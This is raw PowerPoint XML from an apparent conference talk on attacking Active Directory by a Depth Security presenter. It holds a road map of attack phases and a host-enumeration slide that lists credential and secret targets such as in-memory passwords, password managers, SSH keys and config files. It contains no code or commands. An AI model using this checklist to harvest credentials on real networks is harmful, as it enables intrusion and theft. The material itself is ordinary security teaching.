            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Road Map</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272124" y="2052144"/>
            <a:ext cx="11647748" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 1: High-level Overview and Flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 2: Infrastructure and Initial Footholds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 3: Internal Recon, Identifying Attack Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Part 4: Lateral Movement, Taking the Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Part 5: Post-Ex? Automation? Exfiltration? Avoiding Detection? Persistence?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1291094003"/>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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BF26DCB-8D85-4657-BB0E-0454AB0A7F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9804073" cy="6325641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2024862216"/>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9FC6F7-025A-4B77-85F2-6DAA83802F19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180397" y="462387"/>
            <a:ext cx="11593832" cy="4731829"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Ryan Preston ~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Depth Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Teaching an XSS Workshop at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Bsides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> KC on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4/20</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://bsideskc2018.busyconf.com/bookings/new</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D58C8046-6833-4883-9773-299B9DF46C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321074" y="4192113"/>
            <a:ext cx="11870925" cy="1360415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="7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endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226255938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9FC6F7-025A-4B77-85F2-6DAA83802F19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321074" y="112542"/>
            <a:ext cx="11549849" cy="3741833"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Ryan Preston ~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Depth Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Send me feedback!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Slides: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/h3xg4m3s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D58C8046-6833-4883-9773-299B9DF46C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321074" y="4192113"/>
            <a:ext cx="11870925" cy="1360415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="7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000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> *Slides also linked in latest tweet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50796D75-ADF4-4C2C-A922-413A0FD4E17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604690" y="5816991"/>
            <a:ext cx="4166518" cy="689445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="7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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slack:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awsm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35815805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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785FFC86-27BF-433A-A2EC-E205665D0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1521958"/>
            <a:ext cx="4376813" cy="4387556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Anti-virus profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Software profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Firewall Rules/Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E16930-73B6-44FE-B21B-B753AAF54EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1533760"/>
            <a:ext cx="4679211" cy="3790479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Other users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Session keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Passwords in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Sensitive Files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)configs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
